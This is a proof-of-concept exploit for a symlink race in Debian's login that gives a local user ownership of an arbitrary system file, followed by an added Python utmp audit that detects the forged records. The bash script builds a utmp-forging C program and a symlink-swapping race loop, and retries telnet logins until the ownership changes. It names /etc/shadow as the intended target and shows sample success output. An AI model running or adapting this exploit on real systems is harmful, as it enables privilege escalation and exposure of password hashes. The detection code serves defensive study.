Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC
```bash
#!/bin/bash -

echo '
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <utmp.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
  struct utmp entry;
  int i;

  entry.ut_type=LOGIN_PROCESS;
  strcpy(entry.ut_line,"/tmp/x");
  entry.ut_time=0;
  strcpy(entry.ut_user,"badguy");
  strcpy(entry.ut_host,"badhost");
  entry.ut_addr=0;
  for(i=1;i<9;i++) {
    entry.ut_pid=(pid_t)( i + (int)getpid() );
    sprintf(entry.ut_id,"bad%d",i);
    pututline(&entry);
  }
}
' > /tmp/fillutmp.c

cc -o /tmp/fillutmp /tmp/fillutmp.c

echo 'Ask someone with group utmp privileges to do:'
echo '  chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS

echo '
#include <unistd.h>

int main(int argc, char *argv[])
{
  while(1) {
    unlink("/tmp/x");
    symlink(argv[1],"/tmp/x");
    unlink("/tmp/x");
    symlink(argv[2],"/tmp/x");
  }
}
' > /tmp/jigglelnk.c

cc -o /tmp/jigglelnk /tmp/jigglelnk.c

HOST=`hostname` # or simply localhost?
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
echo "You said it will be '$TTY' ..."

ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk $TTY $ATK &
JIG=$!

LOOP=0
while :; do
  ((LOOP = $LOOP + 1))
  echo; echo; echo "Try = $LOOP"

  /tmp/fillutmp

  echo "Telnetting... if login succeeds, just exit for next try..."
  /usr/bin/telnet $HOST

  LS=`ls -ld $ATK`
  case "$LS" in
    *root*root* ) ;; # not done yet...
    * )
      echo; echo
      echo "Success after $LOOP tries!"
      echo "$LS"
      echo; echo
      break
    ;;
  esac
done

kill $JIG
rm /tmp/fillutmp /tmp/jigglelnk /tmp/x

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28  2006 /etc/debian_version
```
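A defensive counterpart to the PoC above, added here and not part of the original posting or of Debian's code: the PoC plants `LOGIN_PROCESS` records whose `ut_line` is the absolute path `/tmp/x`, so this audit parses utmp records and flags login-type entries whose line is not a plain name relative to `/dev`. The 384-byte record layout (glibc on Linux), the helper names and the sample records are assumptions constructed for the example.

```python
import struct

# Assumed on-disk layout: 384-byte struct utmp as written by glibc on Linux.
UTMP = struct.Struct("<h2xi32s4s32s256shhiii4i20x")
LOGIN_PROCESS, USER_PROCESS = 6, 7   # ut_type values from <utmp.h>

def cstr(raw):
    """Decode a fixed-width, NUL-padded utmp field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")

def parse_utmp(blob):
    """Yield (type, pid, line, user) for each complete record in blob."""
    for off in range(0, len(blob) - UTMP.size + 1, UTMP.size):
        f = UTMP.unpack_from(blob, off)
        yield f[0], f[1], cstr(f[2]), cstr(f[4])

def line_problem(line):
    """Return why ut_line is not a device name under /dev, or None if it is."""
    if line.startswith("/"):
        return "absolute path"            # e.g. the PoC's "/tmp/x"
    if ".." in line.split("/"):
        return "parent-directory component"
    return None                           # "tty1", "pts/3" and similar pass

def audit(blob):
    """List (pid, line, user, reason) for suspicious login-type records."""
    findings = []
    for ut_type, pid, line, user in parse_utmp(blob):
        if ut_type in (LOGIN_PROCESS, USER_PROCESS):
            why = line_problem(line)
            if why:
                findings.append((pid, line, user, why))
    return findings

def record(ut_type, pid, line, ut_id, user, host):
    """Build one constructed utmp record (sample data helper)."""
    return UTMP.pack(ut_type, pid, line, ut_id, user, host,
                     0, 0, 0, 0, 0, 0, 0, 0, 0)

# Constructed sample: two ordinary entries and one shaped like the PoC's.
SAMPLE = (record(USER_PROCESS, 1201, b"pts/3", b"ts/3", b"alice", b"192.0.2.10")
          + record(LOGIN_PROCESS, 4242, b"/tmp/x", b"bad1", b"badguy", b"badhost")
          + record(LOGIN_PROCESS, 900, b"tty1", b"1", b"LOGIN", b""))

if __name__ == "__main__":
    for pid, line, user, why in audit(SAMPLE):
        print(f"pid={pid} ut_line={line!r} ut_user={user!r}: {why}")
```

On a live host the same `audit()` can be fed the bytes of `/var/run/utmp`; any finding means a process with group utmp write access has recorded a line that a privileged consumer should not turn into a path.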